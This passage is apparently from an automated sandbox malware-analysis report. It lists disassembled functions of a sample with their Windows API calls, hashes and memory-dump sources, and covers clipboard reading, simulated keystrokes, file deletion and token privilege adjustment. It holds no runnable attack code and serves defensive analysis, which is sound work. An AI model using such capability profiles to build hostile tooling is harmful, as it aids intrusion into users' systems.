                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0019FD41
                                    • SendMessageW.USER32 ref: 0019FD6C
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0019FD84
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0019FD8F
                                    • GetCursorPos.USER32(?), ref: 0019FDB0
                                    • ScreenToClient.USER32(?,?), ref: 0019FDBD
                                    • GetParent.USER32(?), ref: 0019FDD9
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0019FE3F
                                    • SendMessageW.USER32 ref: 0019FE6F
                                    • ClientToScreen.USER32(?,?), ref: 0019FEC5
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0019FEF1
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0019FF19
                                    • SendMessageW.USER32 ref: 0019FF3C
                                    • ClientToScreen.USER32(?,?), ref: 0019FF86
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0019FFB6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 001A004B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 3461372671-4164748364
                                    • Opcode ID: ee04cce472146aa96556efedea1a33040e4daa632b7abdd73102358a343f7263
                                    • Instruction ID: f72b33a2cd761628be337a4fa8a12bd28e3d6753471fe21f0a93e681f174860d
                                    • Opcode Fuzzy Hash: ee04cce472146aa96556efedea1a33040e4daa632b7abdd73102358a343f7263
                                    • Instruction Fuzzy Hash: 3B32CA74604245EFDB24CF28C884BAABBA9FF49354F140A2DF695C72A0D770EC92CB51
                                    Function 0019AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0019B1CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: cfb6707079bfa9b898c4395ced026f9e16b1aa94348b067e5b7f910434721ce2
                                    • Instruction ID: 88ec927c54fe1fadd4fcce4b68361a5c0d88396caaefb8bb1aabf16b3443ad81
                                    • Opcode Fuzzy Hash: cfb6707079bfa9b898c4395ced026f9e16b1aa94348b067e5b7f910434721ce2
                                    • Instruction Fuzzy Hash: EF12CE71504208ABEF299F64ED89FAE7BB8FF85310F144229F916DB2D0EB708945CB51
                                    Function 0014EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0014EB4A
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001A3AEA
                                    • IsIconic.USER32(000000FF), ref: 001A3AF3
                                    • ShowWindow.USER32(000000FF,00000009), ref: 001A3B00
                                    • SetForegroundWindow.USER32(000000FF), ref: 001A3B0A
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001A3B20
                                    • GetCurrentThreadId.KERNEL32 ref: 001A3B27
                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 001A3B33
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001A3B44
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 001A3B4C
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 001A3B54
                                    • SetForegroundWindow.USER32(000000FF), ref: 001A3B57
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B6C
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3B77
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B81
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3B86
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B8F
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3B94
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 001A3B9E
                                    • keybd_event.USER32(00000012,00000000), ref: 001A3BA3
                                    • SetForegroundWindow.USER32(000000FF), ref: 001A3BA6
                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 001A3BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 7d5d2a6c39cfad9029bbb0eb2b951773add2db99f731b5e18ee4ae902ae0b52a
                                    • Instruction ID: 365da6622f28a4717a2cdfaac45b6f74e31560134dd518ca2d373e15cf6739ad
                                    • Opcode Fuzzy Hash: 7d5d2a6c39cfad9029bbb0eb2b951773add2db99f731b5e18ee4ae902ae0b52a
                                    • Instruction Fuzzy Hash: 6F31D475A403187BEB341B659C49F7F3E6DEB44B50F114125FA04EA1D0EBB05D40AEB0
                                    Function 001760DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00175FA6,?), ref: 00176ED8
                                      • Part of subcall function 00176EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00175FA6,?), ref: 00176EF1
                                      • Part of subcall function 0017725E: __wsplitpath.LIBCMT ref: 0017727B
                                      • Part of subcall function 0017725E: __wsplitpath.LIBCMT ref: 0017728E
                                      • Part of subcall function 001772CB: GetFileAttributesW.KERNEL32(?,00176019), ref: 001772CC
                                    • _wcscat.LIBCMT ref: 00176149
                                    • _wcscat.LIBCMT ref: 00176167
                                    • __wsplitpath.LIBCMT ref: 0017618E
                                    • FindFirstFileW.KERNEL32(?,?), ref: 001761A4
                                    • _wcscpy.LIBCMT ref: 00176209
                                    • _wcscat.LIBCMT ref: 0017621C
                                    • _wcscat.LIBCMT ref: 0017622F
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0017625D
                                    • DeleteFileW.KERNEL32(?), ref: 0017626E
                                    • MoveFileW.KERNEL32(?,?), ref: 00176289
                                    • MoveFileW.KERNEL32(?,?), ref: 00176298
                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 001762AD
                                    • DeleteFileW.KERNEL32(?), ref: 001762BE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001762E1
                                    • FindClose.KERNEL32(00000000), ref: 001762FD
                                    • FindClose.KERNEL32(00000000), ref: 0017630B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                    • String ID: \*.*$p1Wu`KXu
                                    • API String ID: 1917200108-2866000061
                                    • Opcode ID: cda14fc28f1a0963d0da08c95f48f868672386f7574e346cbde0262c4bcfd18c
                                    • Instruction ID: bbdc7dcace41ac06d9b37d6cbc8fe92a3106f345f5d4e429b3632a6d094531c5
                                    • Opcode Fuzzy Hash: cda14fc28f1a0963d0da08c95f48f868672386f7574e346cbde0262c4bcfd18c
                                    • Instruction Fuzzy Hash: 5751207280811CAACB25EB91DC44DEF77BCAF15300F0541EAE599E3142EF3697898FA4
                                    Function 0016ACC5 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 223COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0016B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0016B180
                                      • Part of subcall function 0016B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0016B1AD
                                      • Part of subcall function 0016B134: GetLastError.KERNEL32 ref: 0016B1BA
                                    • _memset.LIBCMT ref: 0016AD08
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0016AD5A
                                    • CloseHandle.KERNEL32(?), ref: 0016AD6B
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0016AD82
                                    • GetProcessWindowStation.USER32 ref: 0016AD9B
                                    • SetProcessWindowStation.USER32(00000000), ref: 0016ADA5
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0016ADBF
                                      • Part of subcall function 0016AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0016ACC0), ref: 0016AB99
                                      • Part of subcall function 0016AB84: CloseHandle.KERNEL32(?,?,0016ACC0), ref: 0016ABAB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0$winsta0\default
                                    • API String ID: 2063423040-1685893292
                                    • Opcode ID: dea87b05fafedcbff9f6f69f2ad3eef70b6e7e615e5df00d734d9e46f22dd4fe
                                    • Instruction ID: 629ef6c7074d6477bacf6ef1f1cf9394b8eebba215697812b3cd1e682a9da253
                                    • Opcode Fuzzy Hash: dea87b05fafedcbff9f6f69f2ad3eef70b6e7e615e5df00d734d9e46f22dd4fe
                                    • Instruction Fuzzy Hash: 70819EB1800209AFDF159FA4DC45AEE7B78FF18304F448159F814B6561EB328EA5DF62
                                    Function 00186B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(001CDC00), ref: 00186B36
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00186B44
                                    • GetClipboardData.USER32(0000000D), ref: 00186B4C
                                    • CloseClipboard.USER32 ref: 00186B58
                                    • GlobalLock.KERNEL32(00000000), ref: 00186B74
                                    • CloseClipboard.USER32 ref: 00186B7E
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00186B93
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00186BA0
                                    • GetClipboardData.USER32(00000001), ref: 00186BA8
                                    • GlobalLock.KERNEL32(00000000), ref: 00186BB5
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00186BE9
                                    • CloseClipboard.USER32 ref: 00186CF6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                    • String ID:
                                    • API String ID: 3222323430-0
                                    • Opcode ID: e7972457f5cd364e1e07d525749219d7d82530c48948c7835957337dbfaa744b
                                    • Instruction ID: 893977d32e1ddc3fc12362fc943cd79655924251215d734a873e2007ba2fddc0
                                    • Opcode Fuzzy Hash: e7972457f5cd364e1e07d525749219d7d82530c48948c7835957337dbfaa744b
                                    • Instruction Fuzzy Hash: 8E519E71200201ABD308BF64ED86F6E77A8AF98B10F004129F596D61E1EF70DA45CF62
                                    Function 0017F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0017F62B
                                    • FindClose.KERNEL32(00000000), ref: 0017F67F
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0017F6A4
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0017F6BB
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0017F6E2
                                    • __swprintf.LIBCMT ref: 0017F72E
                                    • __swprintf.LIBCMT ref: 0017F767
                                    • __swprintf.LIBCMT ref: 0017F7BB
                                      • Part of subcall function 0015172B: __woutput_l.LIBCMT ref: 00151784
                                    • __swprintf.LIBCMT ref: 0017F809
                                    • __swprintf.LIBCMT ref: 0017F858
                                    • __swprintf.LIBCMT ref: 0017F8A7
                                    • __swprintf.LIBCMT ref: 0017F8F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 835046349-2428617273
                                    • Opcode ID: 4ea1a00409216bed76f6dddbee8b5b9d7d1bfea22e867fd008bc9e18db43e9ec
                                    • Instruction ID: b967f3df9b234412455d949e384363722cd1ecb47331e2b76367452f5f7774b6
                                    • Opcode Fuzzy Hash: 4ea1a00409216bed76f6dddbee8b5b9d7d1bfea22e867fd008bc9e18db43e9ec
                                    • Instruction Fuzzy Hash: B5A11FB2408344ABC314EBA5C885DAFB7ECBFA8704F40492EF595D7191EB34D949CB62
                                    Function 00181B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00181B50
                                    • _wcscmp.LIBCMT ref: 00181B65
                                    • _wcscmp.LIBCMT ref: 00181B7C
                                    • GetFileAttributesW.KERNEL32(?), ref: 00181B8E
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00181BA8
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00181BC0
                                    • FindClose.KERNEL32(00000000), ref: 00181BCB
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00181BE7
                                    • _wcscmp.LIBCMT ref: 00181C0E
                                    • _wcscmp.LIBCMT ref: 00181C25
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00181C37
                                    • SetCurrentDirectoryW.KERNEL32(001E39FC), ref: 00181C55
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00181C5F
                                    • FindClose.KERNEL32(00000000), ref: 00181C6C
                                    • FindClose.KERNEL32(00000000), ref: 00181C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: c89b15884d45e81988948c16eae4de078249dad75c59e1b3aa0860b61816bcd0
                                    • Instruction ID: ff190b5466c8395e7d43e6a47effa07f960bac1ffbacac6ed551dfc94cde7e9f
                                    • Opcode Fuzzy Hash: c89b15884d45e81988948c16eae4de078249dad75c59e1b3aa0860b61816bcd0
                                    • Instruction Fuzzy Hash: CC31A332500219BFDF14BBA4EC49AEE77ACAF05320F1046A5F911E3090EB70DB868F64
                                    Function 0019F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • DragQueryPoint.SHELL32(?,?), ref: 0019F37A
                                      • Part of subcall function 0019D7DE: ClientToScreen.USER32(?,?), ref: 0019D807
                                      • Part of subcall function 0019D7DE: GetWindowRect.USER32(?,?), ref: 0019D87D
                                      • Part of subcall function 0019D7DE: PtInRect.USER32(?,?,0019ED5A), ref: 0019D88D
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0019F3E3
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0019F3EE
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0019F411
                                    • _wcscat.LIBCMT ref: 0019F441
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0019F458
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0019F471
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0019F488
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0019F4AA
                                    • DragFinish.SHELL32(?), ref: 0019F4B1
                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0019F59C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: fd9bdd7e0ef595eb8e9114baffa15553c059ca69225fe81d7ad264c5db827f2c
                                    • Instruction ID: 9dadcbcd74a73204c530c5f6136d8b11623eba32d9e519ba0da8211cd743c8c9
                                    • Opcode Fuzzy Hash: fd9bdd7e0ef595eb8e9114baffa15553c059ca69225fe81d7ad264c5db827f2c
                                    • Instruction Fuzzy Hash: 46614971508300AFC715EF64DC85DAFBBF8EF99710F400A2EF595A21A1EB709A49CB52
                                    Function 0018091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 001809DF
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001809EF
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001809FB
                                    • __wsplitpath.LIBCMT ref: 00180A59
                                    • _wcscat.LIBCMT ref: 00180A71
                                    • _wcscat.LIBCMT ref: 00180A83
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00180A98
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180AAC
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180ADE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180AFF
                                    • _wcscpy.LIBCMT ref: 00180B0B
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00180B4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                    • String ID: *.*
                                    • API String ID: 3566783562-438819550
                                    • Opcode ID: 2192f50a574610757c982f0683c42c86c1dcc53c93cdffb6e0d441c6b758d084
                                    • Instruction ID: 90a7c540a723e52a66f834432dea3718ef89a2dc3ce2780050471d8e3424b8d9
                                    • Opcode Fuzzy Hash: 2192f50a574610757c982f0683c42c86c1dcc53c93cdffb6e0d441c6b758d084
                                    • Instruction Fuzzy Hash: 09615A725042099FD710EF60C8859AEB3E8FF99314F04495DF99987251EB31EA49CF92
                                    Function 0019EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0019EF3B
                                    • GetFocus.USER32 ref: 0019EF4B
                                    • GetDlgCtrlID.USER32(00000000), ref: 0019EF56
                                    • _memset.LIBCMT ref: 0019F081
                                    • GetMenuItemInfoW.USER32 ref: 0019F0AC
                                    • GetMenuItemCount.USER32(00000000), ref: 0019F0CC
                                    • GetMenuItemID.USER32(?,00000000), ref: 0019F0DF
                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0019F113
                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0019F15B
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0019F193
                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0019F1C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
